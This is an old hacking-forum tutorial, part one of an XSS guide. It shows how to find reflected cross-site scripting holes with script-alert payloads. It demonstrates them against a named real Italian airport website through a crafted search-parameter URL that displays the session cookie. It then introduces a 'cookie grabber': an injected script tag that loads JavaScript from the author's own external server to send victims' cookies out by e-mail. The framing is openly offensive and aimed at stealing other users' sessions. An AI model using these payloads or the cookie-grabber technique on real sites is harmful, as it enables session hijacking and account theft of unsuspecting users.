XSS Guide - Part 1

-------------------------------
Author: Langy
Data: 6-09-2007
Copyright: http://www.googlebig.com
-------------------------------

Links:
http://www.gnucitizen.org/xssdb/application.htm (Attack Database)
http://www.xssed.com (Mirror Archive of Vulnerable Websites)
http://ha.ckers.org/xss.html (XSS Cheat sheet)
http://software.graflex.org/dexss/ (Removing JavaScript from HTML)

http://en.wikipedia.org/wiki/Cross-site_scripting

-------------------------------

Find a xss's vulnerable website is not very difficult.
In most cases can write in the search:

Code:
PHP Code:
"><script>alert('try_xss');</script>
This script does nothing more than send an alert on the screen, if you see the alert means that the script is taken into the site.

Now we try to write:

Code:
PHP Code:
"><script>alert('document.cookie');</script> or
"><script>alert(document.cookie);</script>
If this xss works, we will see on the screen the alert within our cookies session of the site.

Or if he had not run the url just check and see how it is generated:

- Example:

Last xss that I have discovered is on "aeroporto di Puglia" website:

http://www.seap-puglia.it/

if we try to find "><script>alert('try_xss');</script> nothing happens.
But now look at the url:

Code:
PHP Code:
http://www.seap-puglia.it/default.as...2&strRicerca1=
%22%3E%3Cscript%3Ealert('try_xss');%3C/script%3E&strRicerca2=
&strRicerca3=&sel1=AND&sel2=AND&RicInt1=1&RicInt2=0&RicInt3=0
we find the variable that makes it possible to search, in this case "strRicerca1"

Then apply the alert code directly after this variable:

Code:
PHP Code:
http://www.seap-puglia.it/default.as...tiporicerca=2&
strRicerca1="><script>alert('try_xss');</script>
We will magically appear the alert.

Now we try to write:

Code:
PHP Code:
http://www.seap-puglia.it/default.as...oricerca=2&str
Ricerca1="><script>alert(document.cookie);</script>
Perfect! We see our cookie!

At this time we need to know the victim cookie and then comes in a "cookie grabbers". Cookie grabber is a script that stay on our server and it include into website url to send us cookies directly by the victim


If we want include a file with javascript we can write:

Code:
PHP Code:
"><script src="http://www.googlebig.com/cookiescript.js"></script>
Inside the file "cookiescript.js" we write a code that displays the cookie and sends it by e-mail.

This will be shown in the second part of the guide.